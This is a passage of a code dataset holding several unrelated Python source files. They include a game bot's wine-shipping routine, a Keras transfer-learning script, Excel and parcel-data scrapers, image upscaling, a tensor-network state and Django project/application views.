vn\n\t\t\t\tenviar = faltante if vinoDisponible > faltante else vinoDisponible\n\t\t\t\tfaltante -= enviar\n\t\t\t\truta = (ciudadO, ciudadD, idIsla, 0, enviar, 0, 0, 0)\n\t\t\t\trutas.append(ruta)\n\n\tinfo = '\\nEnviar vino\\n'\n\tfor ruta in rutas:\n\t\t(ciudadO, ciudadD, idIsla, md, vn, mr, cr, az) = ruta\n\t\tinfo = info + '{} -> {}\\nVino: {}\\n'.format(ciudadO['cityName'], ciudadD['cityName'], addPuntos(vn))\n\tsetInfoSignal(s, info)\n\ttry:\n\t\tplanearViajes(s, rutas)\n\texcept:\n\t\tmsg = 'Error en:\\n{}\\nCausa:\\n{}'.format(info, traceback.format_exc())\n\t\tsendToBot(msg)\n\tfinally:\n\t\ts.logout()\n","sub_path":"ikabot/funcion/enviarVino.py","file_name":"enviarVino.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"312295421","text":"import os\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras import callbacks\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import losses\nfrom tensorflow.keras import activations\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications import InceptionV3\n\nIMAGE_WIDTH = 128\nIMAGE_HEIGHT = 128\nIMAGE_SIZE = (IMAGE_WIDTH, IMAGE_HEIGHT)\nIMAGE_CHANNELS = 3\n\n\n# Plot results\ndef plot_visualize_training(history):\n fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(12, 12))\n ax1.plot(history.history['loss'], color='b', label=\"Training loss\")\n ax1.plot(history.history['val_loss'], color='r', label=\"validation loss\")\n ax1.set_xticks(np.arange(1, len(history.history['loss']), 1))\n ax1.set_yticks(np.arange(0, 1, 0.1))\n\n ax2.plot(history.history['accuracy'], color='b', label=\"Training accuracy\")\n ax2.plot(history.history['val_accuracy'], color='r', label=\"Validation accuracy\")\n ax2.set_xticks(np.arange(1, len(history.history['loss']), 1))\n\n plt.legend(loc='best', shadow=True)\n plt.tight_layout()\n plt.show()\n\n\n# def plot_sample_images(image_generator, categories=None):\n# plt.figure(figsize=(12, 24))\n#\n# filenames = np.array(image_generator.filenames)\n#\n# if categories is not None:\n# filenames = np.column_stack((filenames, np.array(categories)))\n#\n# samples = random.choices(filenames, k=18)\n#\n# for index, sample in enumerate(samples, start=0):\n# if categories is not None:\n# filename = sample[0]\n# # plt.xlabel(round(float(sample[1])))\n# else:\n# filename = sample\n#\n# image_path = os.path.join(image_generator.directory, filename)\n# sample = image.load_img(image_path, target_size=IMAGE_SIZE)\n#\n# plt.subplot(6, 3, index + 1)\n# plt.imshow(sample)\n#\n# plt.tight_layout()\n# plt.show()\n\n\n# Callbacks\nclass CustomCallback(callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n if logs.get('accuracy') > 0.90:\n print(\"\\nReached 99.5% accuracy so cancelling training!\")\n self.model.stop_training = True\n\n\ndef main():\n # Get pre-trained model\n trained_model = InceptionV3(\n input_shape=(IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS),\n include_top=False\n )\n\n for layer in trained_model.layers:\n layer.trainable = False\n\n trained_model.summary()\n print('last layer output shape: ', trained_model.get_layer('mixed7').output_shape)\n\n # Create model using pre-trained model\n x = layers.Flatten()(trained_model.get_layer('mixed7').output)\n x = layers.Dense(1024, activation=activations.relu)(x)\n x = layers.Dropout(0.2)(x)\n x = layers.Dense(1, activation=activations.sigmoid)(x)\n\n model = Model(\n trained_model.input,\n x\n )\n\n model.compile(\n optimizer=optimizers.RMSprop(learning_rate=0.001),\n loss=losses.BinaryCrossentropy(),\n metrics=['accuracy']\n )\n\n # Augmented training data image flow\n training_image_data_generation = image.ImageDataGenerator(\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n rotation_range=40,\n horizontal_flip=True,\n rescale=1 / 255.\n )\n\n training_image_data = training_image_data_generation.flow_from_directory(\n directory=os.path.join(os.getcwd(), 'datasets', 'images', 'horses_or_humans', 'train'),\n target_size=IMAGE_SIZE,\n class_mode='binary'\n )\n\n #plot_sample_images(training_image_data)\n\n # Validation data should not be augmented\n validation_image_data_generation = image.ImageDataGenerator(\n rescale=1 / 255.\n )\n validation_image_data = validation_image_data_generation.flow_from_directory(\n directory=os.path.join(os.getcwd(), 'datasets', 'images', 'horses_or_humans', 'validation'),\n target_size=IMAGE_SIZE,\n class_mode='binary'\n )\n\n # Training model with new data\n model_callbacks = [\n CustomCallback()\n ]\n\n history = model.fit(\n training_image_data,\n epochs= 2, #50,\n validation_data=validation_image_data,\n callbacks=model_callbacks,\n verbose=2\n )\n\n # Predictions for images\n categories = model.predict(validation_image_data)\n # plot_sample_images(validation_image_data, categories)\n\n # Plot results and check for over-fitting\n plot_visualize_training(history)\n\n\nif __name__ == '__main__':\n main()","sub_path":"src/CNN/Exercise_Humans_and_Horses_Transfer_CNN.py","file_name":"Exercise_Humans_and_Horses_Transfer_CNN.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"527768969","text":"import sys\nimport traceback\nimport pathlib\nimport shutil\nfrom iterators.ItemIterator import *\nfrom selectfiledir.filepicker import GetFile\nfrom excelapp.ExcelApp import ExcelApp, ExcelWorkBook\nfrom dto.ExcelSheetDTO import ExcelSheetDTO\nfrom dao.TableDAO.QueryContext import ExecuteQuery\nfrom functions.StopWatch import stop_watch\n\n_log_base_dir = \"/LogModule\"\n\n\nclass FilePicker():\n def __init__(self):\n self.__def_dir = \"DeskTop\"\n self.__ftype = [(\"Excel2003ファイル\", \"*.xlsx\")]\n self.picker = GetFile(self.__def_dir, self.__ftype)\n self.file_list = self.picker.get_files()\n\n def get_file_list(self):\n if self.file_list is False:\n quit()\n else:\n return self.file_list\n\n\nclass ExcelFile():\n def __init__(self):\n # self.baseapp = None\n self.baseapp = ExcelApp()\n self.app = self.baseapp.app\n self.wb = ExcelWorkBook()\n self.ws = None\n\n def open_excelapp(self):\n self.baseapp = ExcelApp()\n\n # @stop_watch\n def open_workbook(self, filepath):\n self.wb.open_wb(self.app, filepath)\n self.ws = self.wb.xlws\n return self.ws\n\n def close_app_wb(self):\n self.wb.close_workbook()\n\n def close_app(self):\n self.app.quit()\n\n def close_baseapp(self):\n self.baseapp.close_App()\n\n def close(self):\n self.close_app_wb()\n self.close_baseapp()\n\n\nclass ExcelDataToDTO():\n def __init__(self):\n self.file_list = []\n self.get_filepath_list()\n self.excelapp = ExcelFile()\n self.item_shelf = ItemShelf()\n self.dto = None\n\n def get_filepath_list(self):\n picker = FilePicker()\n self.file_list = picker.get_file_list()\n\n def get_excel_dto(self):\n for i in self.file_list:\n ws = self.excelapp.open_workbook(i)\n try:\n self.dto = ExcelSheetDTO(ws)\n except AttributeError as e:\n type_, value, traceback_ = sys.exc_info()\n print(traceback.format_exception(type_, value, traceback_))\n self.excelapp.close()\n quit()\n else:\n self.item_shelf.append(self.dto)\n self.excelapp.close_app_wb()\n self.excelapp.close_app()\n return self.item_shelf\n\n def close_app(self):\n self.excelapp.close_app()\n\n\n\nclass DTO():\n def __init__(self):\n self.file_shelf = ItemShelf()\n self.exapp = ExcelFile()\n self.dto = None\n\n def get_filepath_itr(self):\n picker = FilePicker()\n filelist = picker.get_file_list()\n for item in filelist:\n self.file_shelf.append(item)\n\n def change_dir(self,filename):\n currentdir=pathlib.Path(filename).parent\n new_dir=currentdir / \"import済\"\n shutil.move(filename,new_dir)\n\n def get_dto(self,filepath):\n ws = self.exapp.open_workbook(filepath)\n try:\n self.dto = ExcelSheetDTO(ws)\n except Exception as e:\n print(e)\n\n # def ws_open(self,filepath):\n # # tmp = pathlib.Path(self.logbase)\n # # log_file = tmp / \"execute_log.txt\"\n # # basename = pathlib.Path(filepath).name\n # try:\n # self.ws = self.excelapp.open_workbook(filepath)\n # except Exception as e:\n # type_, value, traceback_ = sys.exc_info()\n # print(traceback.format_exception(type_, value, traceback_))\n # # self.intext = str(basename) + \": read NG : \" + str(traceback.format_exception(type_, value, traceback_)) + \\\n # # \"\\n\"\n # raise\n # else:\n # # self.intext = str(basename) + \": read OK\\n\"\n # self.close_app_wb()\n # # finally:\n # # with open(log_file,\"a\",encoding=\"utf-8\") as f:\n # # f.write(self.intext)\n\n\n\nif __name__ == \"__main__\":\n dto = DTO()\n dto.get_filepath_itr()\n it = dto.file_shelf.iterator()\n while it.hasnext():\n item = it.next()\n print(item)\n","sub_path":"project01/industrysurvey/mainmodule/CreateDTO.py","file_name":"CreateDTO.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"123239758","text":"mode = \"live\"\n# test_file = \"agent/pcap_files/test.pcap\"\nshark_path = \"C:\\\\Program Files\\\\Wireshark\\\\tshark.exe\"\n# iface = \"enxb827eb6c633a\"\niface = \"6\"\n\noutput_folder = \"../runtime/data/listener\"\nlogs_folder = \"../runtime/logs/listener\"\ndebug_mode = True\nmq_host = \"localhost\"\nmq_port = 1883\n\ncapture_interval = 5","sub_path":"agent/app/listener/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"408507190","text":"# Function for Scraping the Parcel API and Storing in The RedB Database\n# Needs to be converted into an Airflow DAG and Ran on First of Month\n\nimport requests\nimport psycopg2\nfrom psycopg2.extras import Json, DictCursor\nfrom zipfile import ZipFile\nfrom dbfread import DBF\nfrom pandas import DataFrame\n\n# These Secrets are Already Available to Airflow in the RedB Connector\n# See https://github.com/stlrda/REDB-Workflows/blob/master/dags/REDB_ELT.py#L26\nDB_HOST = ''\nDB_NAME = 'redb'\nDB_PORT = 5432\nDB_PASS = ''\nDB_USER = 'airflow_user'\n\nAPI_KEY = ''\n# API_Key needs to be made into an Airflow Connection\n\n\n# Connection to DB (Will get replaced with Airflow Connector)\nconn = psycopg2.connect(host = DB_HOST, port = DB_PORT, user = DB_USER, password = DB_PASS, database = DB_NAME)\n\n\ndef api_get_parcel(url, key, handle):\n query = url + '?key=' + key + '&handle=' + handle\n try:\n resp = requests.get(query)\n data = resp.json()\n except Exception:\n print('API Failure at Handle: ' + handle)\n data = '{\"No\": \"Data\"}'\n return data\n\n\ndef scrape_parcel_api(url, key, list_handles):\n for handle in list_handles:\n # Get Parcel Info from API\n try:\n parcel_info = api_get_parcel(url, key, handle)\n print(handle + ' Returned Data')\n except Exception:\n print('Failure to get Data at:' + handle)\n\n # Put this Info in the Database\n cursor = conn.cursor(cursor_factory=DictCursor)\n try:\n cursor.execute(\"INSERT INTO city_api.parcel_data (handle, parcel_data) VALUES(%s, %s) ON CONFLICT (handle) DO UPDATE SET parcel_data = %s\", (handle, Json(parcel_info), Json(parcel_info)))\n conn.commit()\n except Exception:\n print(\"Could not insert parcel\")\n cursor.close()\n\n\ndef scrape_handles():\n # Download zip file to root directory of repo\n URL = 'https://www.stlouis-mo.gov/data/upload/data-files/prcl_shape.zip'\n r = requests.get(URL, stream=True)\n with open('../parcel_shape.zip', 'wb') as fd:\n for chunk in r.iter_content(chunk_size=128):\n fd.write(chunk)\n\n # Extract prcl.dbf from zip file\n with ZipFile('../parcel_shape.zip', 'r') as zipObject:\n file_names = zipObject.namelist()\n for file_name in file_names:\n if file_name.endswith('.dbf'):\n zipObject.extract(file_name, '../')\n print('Extracted ' + file_name + ' from zip file')\n\n # Convert dbf file to pandas dataframe and return list of handles\n dbf = DBF('../prcl.dbf')\n df = DataFrame(iter(dbf))\n\n return df['HANDLE'].to_list()\n\n\ndef main():\n handles = scrape_handles()\n scrape_parcel_api('https://portalcw.stlouis-mo.gov/a/property', API_KEY, handles)\n","sub_path":"scripts/parcels_to_postgres.py","file_name":"parcels_to_postgres.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"394036303","text":"'''\nHeader for Marsha.pdf files\n'''\nimport re\n\nheaders = [\n 'FOLIO #', 'SEG#', 'NAME', 'PHONE', 'USER',\n 'MARSHA #', 'COMPANY', 'ARRIVAL', '#NT', 'DEPARTURE',\n 'ROOM TYPE', 'RATE PRGM', 'RATE', 'ROOM NTS', 'REVEUNE'\n ]\n\nstr_patterns = [\n '***** CANCELLATIONS *****',\n '***** CHANGES 44444'\n ]\n\nregex_patterns = [\n re.compile('\\**\\s(CHANGES|CANCELLATIONS)\\s[\\**\\d]{0,5}'),\n re.compile('REVEN\\w*'),\n re.compile('M[A-Z]RRI\\w*')\n ]\n\np = regex_patterns[0]\n\n\ndef add_html_newlines(text):\n return text.replace(\"\\n\", \"
\\n\")\n\n\n# SO#6750240\n# how to do re.compile with a list in python\nfruit_list = ['apple', 'banana', 'peach', 'plum', 'pineapple', 'kiwi']\nfruit = re.compile('|'.join(fruit_list))\nfruit = re.compile(r'\\b(?:%s)\\b' % '|'.join(fruit_list)) #added word boundries\n","sub_path":"audit/src/pdf_headers.py","file_name":"pdf_headers.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"52596632","text":"import sys\nfrom PIL import Image, ImageDraw\n\n# Endereco da imagem\nimagem = sys.argv[1]\n\n# Abre a imagem original em modo tons de cinza\norigem = Image.open(imagem).convert('L')\n\n# Cria a imagem de destino\ndestino = Image.new('L', (origem.width * 2, origem.height * 2))\ndestinoDraw = ImageDraw.Draw(destino)\n\n# Ampliação bilinear\nfor x in range(origem.width):\n for y in range(origem.height):\n # Pixel de origem\n pOrigem = origem.getpixel((x, y))\n\n # Pixel a direita\n if x < origem.width - 1:\n pDir = origem.getpixel((x + 1, y))\n else:\n pDir = origem.getpixel((x, y))\n\n # Pixel abaixo\n if y < origem.height - 1:\n pBaixo = origem.getpixel((x, y + 1))\n else:\n pBaixo = origem.getpixel((x, y))\n\n # Pixel a diagonal\n if x < origem.width - 1 and y < origem.height - 1:\n pDiag = origem.getpixel((x + 1, y + 1))\n else:\n pDiag = origem.getpixel((x, y))\n\n destinoDraw.point((x * 2, y * 2), pOrigem)\n destinoDraw.point((x * 2 + 1, y * 2), (int((pOrigem + pDir) / 2)))\n destinoDraw.point((x * 2, y * 2 + 1), (int((pOrigem + pBaixo) / 2)))\n destinoDraw.point((x * 2 + 1, y * 2 + 1), (int((pOrigem + pDir + pBaixo + pDiag) / 4)))\n\n# Salva a imagem\ndestino.save('Bilinear_amp_' + imagem)\n","sub_path":"Bilinear_amp.py","file_name":"Bilinear_amp.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"124581878","text":"#Get house share photos script\n#Relies on CSV outputted from getCSVs.py\n#Optionally run interactively in iPython, Jupyter and examine the db data frame or call getData(0, howeverManyImages)\n\nimport sys\nimport os\nimport pandas as pd\nimport numpy\nimport urllib\nimport time\n\n#City to read listings file from. In this example Paris.\n#Set read_csv_loc as location of where you downloaded and unpacked /data/listings.csv.gz from pullCSVs.py\nread_csv_loc = '/home/adam/CVProjects/AirBnBConvNet/Data/PAR/listingsBig.csv'\n#Set out_image_base to wherever you want the image data to go\nout_image_base = '/home/adam/CVProjects/AirBnBConvNet/Data/Pics/PAR/'\n\n#pandas work\ndb = pd.read_csv(read_csv_loc)\nprint(db.keys())\nurls = db['xl_picture_url']\ndict = urls.to_dict()\nvalues = dict.values()\nlength = len(values)\n\ndef getData(start, end):\n for i in xrange(start, end):\n delay = abs(numpy.random.randn()) #samples from normal with mean 0, variance 1\n time.sleep(delay) #Be nice to the servers\n print(\"Delayed for %s seconds\" % delay)\n try:\n link = values[i]\n id = db.id[i]\n out_image_location = out_image_base + str(id) + '.jpg'\n urllib.urlretrieve(link, out_image_location)\n print(\"Got image %s\" % id)\n except:\n e = sys.exc_info()[0] #Pulls error info\n print(\"

Error: %s

\" % e )\n\n#Get all the data!\ngetData(0, length)\n","sub_path":"getPics.py","file_name":"getPics.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"21741099","text":"import argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Split queries and corresponding QREL files.')\n\n parser.add_argument('--src_dir',\n metavar='input data directory',\n help='input data directory',\n type=str, required=True)\n parser.add_argument('--dst_dir',\n metavar='output data directory',\n help='output data directory',\n type=str, required=True)\n parser.add_argument('--seed',\n metavar='random seed',\n help='random seed',\n type=int, default=0)\n parser.add_argument('--partitions_names',\n metavar='names of partitions to split at',\n help='names of partitions to split at separated by comma',\n default=\"bitext,train_fusion,dev\",\n type=str)\n parser.add_argument('--partitions_sizes',\n metavar='sizes of partitions to split at',\n help=\"sizes (in queries) of partitions to split at separated by comma (one of the values can be -1, \"\n \"in that case all left queries go to that partition)\",\n default=\"-1,10000,10000\",\n type=str)\n\n return Arguments(parser.parse_args())\n\nclass Arguments:\n def __init__(self, raw_args):\n self.raw_args = raw_args\n\n @property\n def src_dir(self):\n return self.raw_args.src_dir\n\n @property\n def dst_dir(self):\n return self.raw_args.dst_dir\n \n @property\n def seed(self):\n return self.raw_args.seed\n \n @property \n def partitions_names(self):\n return self.raw_args.partitions_names.split(',')\n \n def partitions_sizes(self, queries_count):\n raw_values = list(map(int, self.raw_args.partitions_sizes.split(',')))\n nondefined_count = 0\n defined_sum = 0\n for value in raw_values:\n if value != -1:\n assert 0 < value < queries_count\n defined_sum += value\n else:\n nondefined_count += 1\n\n if nondefined_count == 0 and defined_sum == queries_count:\n return raw_values\n elif nondefined_count == 1 and defined_sum < queries_count:\n raw_values[raw_values.index(-1)] = queries_count - defined_sum\n return raw_values\n else:\n raise ValueError(\"invalid --partitions_sizes argument\")\n","sub_path":"scripts/data_convert/wikipedia_dpr/split_queries_args.py","file_name":"split_queries_args.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"23771323","text":"from __future__ import division\nfrom SimplePEPS.tools.containers import Struct\nfrom SimplePEPS.contract import np, ncon, TensorNetwork\nBond = TensorNetwork.Bond\nTITN = TensorNetwork.TITN\n\nzig_geometry = TITN.HoneycombWF(dims='XY', sites='AB', bonds=('pA', 'pB', 'x', 'y', 'z'))\nbond_dim = Struct(pA=4, pB=4, x=3, y=3, z=3)\n\ngeometry = zig_geometry\n\nsinglet = np.array([[0, 1], [-1, 0]]) # = |01> - |10>\nassert singlet[0, 1] == 1\nassert singlet[1, 0] == -1\n\ntriplet = np.reshape(np.array([[1, 0, 0, 0],[0, 1/np.sqrt(2), 1/np.sqrt(2), 0],[0, 0, 0, 1]]), (3, 2, 2)) # shape 3, 4 -> 3, 2, 2\n\nbond_singlet = np.zeros((3, 3))\nbond_singlet[0, 0] = 1\nbond_singlet[1:3, 1:3] = 1/np.sqrt(2)*singlet\n\nproj = np.zeros((3, 3, 3, 3))\nproj[:, 1:, 1:, 0] = triplet\nproj[:, 1:, 0, 1:] = triplet\nproj[:, 0, 1:, 1:] = triplet\n\n\ndef arrays(g=1):\n \"\"\"\n \"\"\"\n SA = np.zeros((4,3,3,3))\n SA[0, 0, 0, 0] = 1\n SA[1:, :, :, :] = g*proj\n\n\n SB = ncon.ncon([SA, bond_singlet, bond_singlet, bond_singlet],\n ['pxyz', 'xX', 'yY', 'zZ'],\n sequence='xyz', axes=['p', 'X', 'Y', 'Z'])\n\n return {'A':SA, 'B':SB}\n","sub_path":"SimplePEPS/states/tc/AKLT_tc_vertex.py","file_name":"AKLT_tc_vertex.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"451911281","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.mixins import (\n LoginRequiredMixin, PermissionRequiredMixin)\nfrom notifications.signals import notify\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse, reverse_lazy\nfrom django.db.models import Q\nfrom django.forms.models import modelformset_factory\nfrom django.views.generic import (\n TemplateView, DetailView, UpdateView,\n CreateView, DeleteView, ListView, RedirectView)\n\nimport markdown\nfrom . import models, forms, mixins\n\n\nclass HomeView(TemplateView):\n template_name = 'main/home.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n projects = models.Project.objects \\\n .prefetch_related('positions') \\\n .all()\n project_needs = models.Position \\\n .objects.order_by('name') \\\n .distinct()\n\n context['projects'] = projects\n context['project_needs'] = project_needs\n\n return context\n\n\nclass FilterByPositionView(ListView):\n model = models.Project\n template_name = 'main/home.html'\n\n def get(self, request):\n search_position = request.GET.get('q', '')\n\n if search_position:\n projects = self.model.objects \\\n .filter(positions__name=search_position)\n else:\n projects = self.model.objects.all()\n\n project_needs = models.Position.objects \\\n .order_by('name').distinct()\n\n return render(request, self.template_name, {\n 'projects': projects,\n 'project_needs': project_needs,\n 'search_position': search_position})\n\n\n# -----\n# Projects\n# -----\nclass ProjectCreateView(\n PermissionRequiredMixin, LoginRequiredMixin,\n CreateView):\n\n model = models.Project\n form_project = forms.ProjectForm\n form_positions = forms.PositionFormSet\n permission_required = 'main.employer'\n\n template_name = 'main/project_create.html'\n\n def get(self, request):\n return render(request, self.template_name, {\n 'form_project': self.form_project(prefix='project'),\n 'form_positions': self.form_positions(prefix='positions')\n })\n\n def post(self, request, *args, **kwargs):\n form_project = self.form_project(request.POST, prefix='project')\n form_positions = self.form_positions(request.POST, prefix=\"positions\")\n\n if form_project.is_valid() and form_positions.is_valid():\n project = form_project.save(commit=False)\n project.user = request.user\n project.save()\n\n positions = form_positions.save(commit=False)\n\n for position in positions:\n position.project = project\n position.save()\n\n return redirect('project', pk=project.pk)\n\n return render(request, self.template_name, {\n 'form_project': form_project,\n \"form_positions\": form_positions})\n\n\nclass ProjectDetailView(DetailView):\n model = models.Project\n template_name = 'main/project.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n project = models.Project.objects \\\n .prefetch_related('positions') \\\n .get(pk=self.kwargs.get('pk'))\n\n project.description = markdown.markdown(project.description)\n context['project'] = project\n\n return context\n\n\nclass ProjectEditView(\n PermissionRequiredMixin,\n LoginRequiredMixin,\n mixins.ProjectMustBeAuthorMixin,\n UpdateView):\n\n fields = (\n 'title', 'timeline',\n 'applicant_requirements', 'description')\n model = models.Project\n form_project = forms.ProjectForm\n form_positions = forms.PositionFormSet\n template_name = 'main/project_edit.html'\n permission_required = 'main.employer'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n project = models.Project.objects.get(pk=self.kwargs.get('pk'))\n positions = models.Position.objects.filter(project=project)\n\n context['project'] = project\n context['form_project'] = self.form_project(\n instance=project,\n prefix=\"project\")\n context['form_positions'] = self.form_positions(\n instance=project,\n prefix=\"positions\")\n\n return context\n\n def post(self, request, *args, **kwargs):\n project = self.model.objects.get(pk=self.kwargs.get('pk'))\n\n form_project = self.form_project(\n instance=project,\n data=request.POST,\n prefix='project')\n form_positions = self.form_positions(\n instance=project,\n data=request.POST,\n prefix=\"positions\")\n\n if form_project.is_valid() and form_positions.is_valid():\n form_project.save()\n form_positions.save()\n\n return redirect('project', pk=project.pk)\n\n return render(request, self.template_name, {\n 'project': project,\n 'form_project': form_project,\n \"form_positions\": form_positions})\n\n\nclass ProjectDeleteView(\n LoginRequiredMixin, mixins.ProjectMustBeAuthorMixin,\n DeleteView):\n\n model = models.Project\n template_name = 'main/project_delete.html'\n success_url = reverse_lazy('home')\n\n\nclass ApplicationSubmitView(LoginRequiredMixin, CreateView):\n model = models.Application\n\n def get(self, request, *args, **kwargs):\n user = self.request.user\n project = get_object_or_404(\n models.Project,\n pk=self.kwargs.get('project_pk'))\n position = get_object_or_404(\n models.Position,\n pk=self.kwargs.get('position_pk'))\n profile = get_object_or_404(\n models.Profile,\n user=self.request.user)\n application = self.model.objects.filter(\n user=user,\n project=project,\n position=position)\n\n if not application:\n application = self.model.objects.create(\n user=user,\n profile=profile,\n position=position,\n project=project)\n\n messages.add_message(\n request,\n messages.SUCCESS,\n 'Application has been submitted!',\n extra_tags='submission')\n\n else:\n messages.add_message(\n request,\n messages.ERROR,\n 'Application has already been submitted!',\n extra_tags='submission')\n\n return redirect(reverse('project', kwargs={\n 'pk': self.kwargs.get('project_pk')}))\n\n\n# -----\n# Profile\n# -----\nclass ProfileView(LoginRequiredMixin, TemplateView):\n model = models.Profile\n template_name = 'main/profile.html'\n\n def get(self, request, pk):\n try:\n profile = self.model.objects.get(pk=pk)\n except models.Profile.DoesNotExist:\n profile = self.model.objects.create(user=request.user)\n\n profile.short_bio = markdown.markdown(profile.short_bio)\n\n projects = models.Project.objects.filter(\n applications__profile__user=request.user,\n applications__status='Accepted')\n\n unread_notifications = request.user.notifications.unread()\n notifications = [str(x) for x in request.user.notifications.unread()]\n unread_notifications.mark_all_as_read()\n\n return render(request, self.template_name, {\n 'notifications': notifications,\n 'profile': profile,\n 'projects': projects})\n\n\nclass ProfileEditView(\n LoginRequiredMixin, mixins.ProfileMustBeAuthorMixin,\n UpdateView):\n\n fields = ('name', 'short_bio', 'profile_image')\n model = models.Profile\n form_profile = forms.ProfileForm\n form_user_projects = forms.UserProjectFormSet\n form_skills = forms.SkillFormSet\n template_name = 'main/profile_edit.html'\n\n def get_past_projects(self):\n projects = models.Project.objects.filter(\n applications__profile__user=self.request.user,\n applications__status='Accepted')\n\n return projects\n\n def get_object(self):\n obj = get_object_or_404(self.model, user=self.request.user)\n return obj\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n profile = self.model.objects.get(user=self.request.user)\n projects = self.get_past_projects()\n\n context['projects'] = projects\n context['form_profile'] = self.form_profile(\n instance=profile,\n prefix=\"profile\")\n context['form_user_projects'] = self.form_user_projects(\n instance=profile,\n prefix=\"user_projects\")\n context['form_skills'] = self.form_skills(\n instance=profile,\n prefix=\"skills\")\n\n return context\n\n def post(self, request, *args, **kwargs):\n profile = self.model.objects.get(user=request.user)\n projects = self.get_past_projects()\n\n form_profile = self.form_profile(\n request.POST, request.FILES,\n instance=profile,\n prefix='profile')\n form_user_projects = self.form_user_projects(\n instance=profile,\n data=request.POST,\n prefix=\"user_projects\")\n form_skills = self.form_skills(\n instance=profile, data=request.POST,\n prefix=\"skills\")\n\n if (form_profile.is_valid() and\n form_user_projects.is_valid() and\n form_skills.is_valid()):\n\n profile = form_profile.save()\n form_user_projects.save()\n form_skills.save()\n\n return redirect(reverse('profile', kwargs={\n 'pk': profile.pk}))\n\n return render(request, self.template_name, {\n 'form_profile': form_profile,\n \"form_user_projects\": form_user_projects,\n \"form_skills\": form_skills,\n \"projects\": projects})\n\n\n# -----\n# Applications\n# -----\nclass ApplicationsView(\n PermissionRequiredMixin, LoginRequiredMixin,\n TemplateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def get(self, request):\n form_status = forms.ApplicationForm()\n redirect = ''\n\n filtered_applicants = self.model.objects \\\n .filter(project__user=request.user)\n my_projects = models.Project.objects \\\n .filter(user=request.user)\n my_proj_needs = models.Position.objects \\\n .filter(Q(project__user=request.user)).distinct()\n\n return render(request, self.template_name, {\n 'my_projects': my_projects,\n 'my_proj_needs': my_proj_needs,\n 'filtered_applicants': filtered_applicants,\n 'form_status': form_status,\n 'redirect': redirect})\n\n\nclass ApplicationsByProjectNeedView(\n PermissionRequiredMixin, LoginRequiredMixin,\n TemplateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def get(self, request):\n form_status = forms.ApplicationForm()\n redirect = 'proj_need'\n q = request.GET.get('q', '')\n\n if q:\n filtered_applicants = self.model.objects \\\n .filter(Q(project__user=request.user) &\n Q(position__name__iexact=q))\n else:\n filtered_applicants = self.model.objects \\\n .filter(project__user=request.user)\n\n my_projects = models.Project.objects \\\n .filter(user=request.user)\n my_proj_needs = models.Position.objects \\\n .filter(Q(project__user=request.user)).distinct()\n\n return render(request, self.template_name, {\n 'q': q,\n 'my_projects': my_projects,\n 'my_proj_needs': my_proj_needs,\n 'filtered_applicants': filtered_applicants,\n 'form_status': form_status,\n 'redirect': redirect})\n\n\nclass ApplicationsByProjectView(\n PermissionRequiredMixin, LoginRequiredMixin,\n TemplateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def get(self, request):\n form_status = forms.ApplicationForm()\n redirect = 'project'\n q = request.GET.get('q', '')\n\n if q:\n filtered_applicants = self.model.objects \\\n .filter(Q(project__title__iexact=q) &\n Q(project__user=request.user))\n else:\n filtered_applicants = self.model.objects \\\n .filter(project__user=request.user)\n\n my_projects = models.Project.objects \\\n .filter(user=request.user)\n my_proj_needs = models.Position.objects \\\n .filter(Q(project__user=request.user)) \\\n .distinct()\n\n return render(request, self.template_name, {\n 'q': q,\n 'my_projects': my_projects,\n 'my_proj_needs': my_proj_needs,\n 'filtered_applicants': filtered_applicants,\n 'form_status': form_status,\n 'redirect': redirect})\n\n\nclass ApplicationsByStatusView(\n PermissionRequiredMixin, LoginRequiredMixin,\n TemplateView):\n\n model = models.Application\n template_name = 'main/applications.html'\n permission_required = 'main.employer'\n\n def get(self, request):\n form_status = forms.ApplicationForm()\n redirect = 'status'\n q = request.GET.get('q', '')\n\n if q:\n filtered_applicants = self.model.objects \\\n 